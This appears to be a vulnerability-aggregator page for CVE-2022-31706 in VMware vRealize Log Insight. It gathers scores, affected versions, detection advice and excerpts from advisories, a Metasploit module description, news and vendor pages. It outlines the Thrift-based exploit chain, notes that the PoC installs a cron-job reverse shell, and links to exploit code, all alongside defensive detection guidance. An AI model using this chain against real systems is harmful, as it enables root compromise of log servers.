CVE-2022-31706
published 2023-01-26CVE-2022-31706: The vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an…
PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
87.08%
99.7th percentile
The vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vmware | vrealize_log_insight | 3.0 – 4.8 | — |
| vmware | vrealize_log_insight | >= 8.0.0 < 8.10.2 | 8.10.2 |
Detection & IOCsextracted from sources · hover to see the quote
commandRemotePakDownloadCommand via exposed thrift service after obtaining node token via GetConfigRequest thrift command, followed by PakUpgradeCommand↗
otherThrift RPC endpoints abused for arbitrary file write; IP address spoofing to match master/worker node IP↗
- →Detect version enumeration probes targeting vRealize Log Insight version endpoints; responses containing 'logInsight' or 'releaseName":' in body with HTTP 200 indicate a vulnerable instance ↗
- →Monitor for unauthenticated GET requests to /i18n/component/JS?locale=en-US and /api/v1/version as reconnaissance steps preceding exploitation ↗
- →Check Point IPS signature available for this CVE; use signature 'VMware vRealize Log Insight Directory Traversal (CVE-2022-31706)' for network-level detection ↗
- →Exploitation requires attacker to have the same IP address as a master/worker node; monitor for unexpected IP address additions or static IP configuration changes on vRealize Log Insight nodes ↗
- →Monitor for new or modified cron jobs on vRealize Log Insight appliances, as the default PoC payload writes a cron job to establish a reverse shell ↗
- →Monitor for Thrift RPC traffic to vRealize Log Insight nodes, particularly GetConfigRequest and RemotePakDownloadCommand/PakUpgradeCommand sequences from unexpected sources ↗
- →CVE-2022-31706 is chained with CVE-2022-31704 (broken access control) and CVE-2022-31711 (information disclosure); detect exploitation of all three together under VMSA-2023-0001 ↗
- ·vRealize Log Insight is unlikely to be internet-facing; exploitation is more probable as a lateral movement technique from an already-compromised internal foothold ↗
- ·Affected versions span 8.x (8.0.0–8.10.x) and older 3.x/4.x branches per the Nuclei template version comparisons; version 8.10.2 is the fixed release per the advisory ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VMware
VMware vRealize Log Insight latest updates address multiple security vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31710, CVE-2022-31711)
vendor_vmware·2023-01-24·CVSS 9.8
CVE-2022-31704 [CRITICAL] VMware vRealize Log Insight latest updates address multiple security vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31710, CVE-2022-31711)
VMSA-2023-0001: VMware vRealize Log Insight latest updates address multiple security vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31710, CVE-2022-31711)
The vRealize Log Insight contains a Directory Traversal Vulnerability. VMware has evaluated the severity of this issue to be in the critical severity range with a maximum CVSSv3 base score of 9.8.
CVEs: CVE-2022-31704, CVE-2022-31706, CVE-2022-31710, CVE-2022-31711
Affected products: VMware Aria, VMware Cloud Foundation, VMware vRealize
GHSA
GHSA-653w-r2gq-wv35: The vRealize Log Insight contains a Directory Traversal Vulnerability
ghsa_unreviewed·2023-01-26
CVE-2022-31706 [CRITICAL] CWE-22 GHSA-653w-r2gq-wv35: The vRealize Log Insight contains a Directory Traversal Vulnerability
The vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.
VulnCheck
VMware vrealize_log_insight Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2022·CVSS 9.8
CVE-2022-31706 [CRITICAL] VMware vrealize_log_insight Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
VMware vrealize_log_insight Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.
Affected: VMware vrealize_log_insight
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://25491742.fs1.hubspotusercontent-eu1.net/hubfs/25491742/WAZAWAKA_TLPCLEAR_Report.pdf
Exploit PoC: https://vulncheck.com/xdb/ddb06c8c45d9
No detection rules found.
Nuclei
VMware vRealize Log Insight - Path Traversal
nuclei·CVSS 9.8
CVE-2022-31706 [CRITICAL] VMware vRealize Log Insight - Path Traversal
VMware vRealize Log Insight - Path Traversal
he vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.
Template:
id: CVE-2022-31706
info:
name: VMware vRealize Log Insight - Path Traversal
author: ritikchaddha
severity: critical
description: |
he vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.
impact: |
A remote, unauthenticated attacker can inject malicious files leading to remote code execution on the target appliance, resulting in complete compromise of the affect
Metasploit
VMware vRealize Log Insight Unauthenticated RCE
metasploit
VMware vRealize Log Insight Unauthenticated RCE
VMware vRealize Log Insight Unauthenticated RCE
VMware vRealize Log Insights versions v8.x contains multiple vulnerabilities, such as directory traversal, broken access control, deserialization, and information disclosure. When chained together, these vulnerabilities allow a remote, unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. This module achieves code execution via triggering a `RemotePakDownloadCommand` command via the exposed thrift service after obtaining the node token by calling a `GetConfigRequest` thrift command. After the download, it will trigger a `PakUpgradeCommand` for processing the specially crafted PAK archive, which then will place the JSP payload under a certain API endpoint (pre-authenticated) location upon
Bleepingcomputer
VMware warns admins of public exploit for vRealize RCE flaw
blogs_bleepingcomputer·2023-10-24·CVSS 9.8
CVE-2023-34051 [CRITICAL] VMware warns admins of public exploit for vRealize RCE flaw
## VMware warns admins of public exploit for vRealize RCE flaw
## Sergiu Gatlan
VMware warned customers on Monday that proof-of-concept (PoC) exploit code is now available for an authentication bypass flaw in vRealize Log Insight (now known as VMware Aria Operations for Logs).
"Updated VMSA to note that VMware has confirmed that exploit code for CVE-2023-34051 has been published," the company said in an update to the original advisory.
Tracked as CVE-2023-34051 , it allows unauthenticated attackers to execute code remotely with root permissions if certain conditions are met.
Successful exploitation hinges on the attacker compromising a host within the targeted environment and possessing permissions to add an extra interface or static IP address, according to Horizon3 security research
Tenable
CVE-2023-20864: VMware Aria Operations for Logs Deserialization Vulnerability
blogs_tenable·2023-04-21·CVSS 9.8
[CRITICAL] CVE-2023-20864: VMware Aria Operations for Logs Deserialization Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
6th February – Threat Intelligence Report
blogs_checkpoint·2023-02-06
CVE-2022-31711 6th February – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 6th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 6th February, please download our Threat_Intelligence Bulletin
TOP ATTACKS AND BREACHE
Check Point Research has flagged the Dingo crypto Token, with a market cap of $10,941,525 as a scam. The threat actors behind the token added a backdoor function in its smart contract, to manipulate the fee. Specifically, they used the “setTaxFeePercent” function within the token’s smart contract code to manipulate the buyin
http://packetstormsecurity.com/files/174606/VMware-vRealize-Log-Insight-Unauthenticated-Remote-Code-Execution.htmlhttps://www.vmware.com/security/advisories/VMSA-2023-0001.htmlhttp://packetstormsecurity.com/files/174606/VMware-vRealize-Log-Insight-Unauthenticated-Remote-Code-Execution.htmlhttps://www.vmware.com/security/advisories/VMSA-2023-0001.htmlhttps://packetstorm.news/files/id/174606
2023-01-26
Published
Exploited in the wild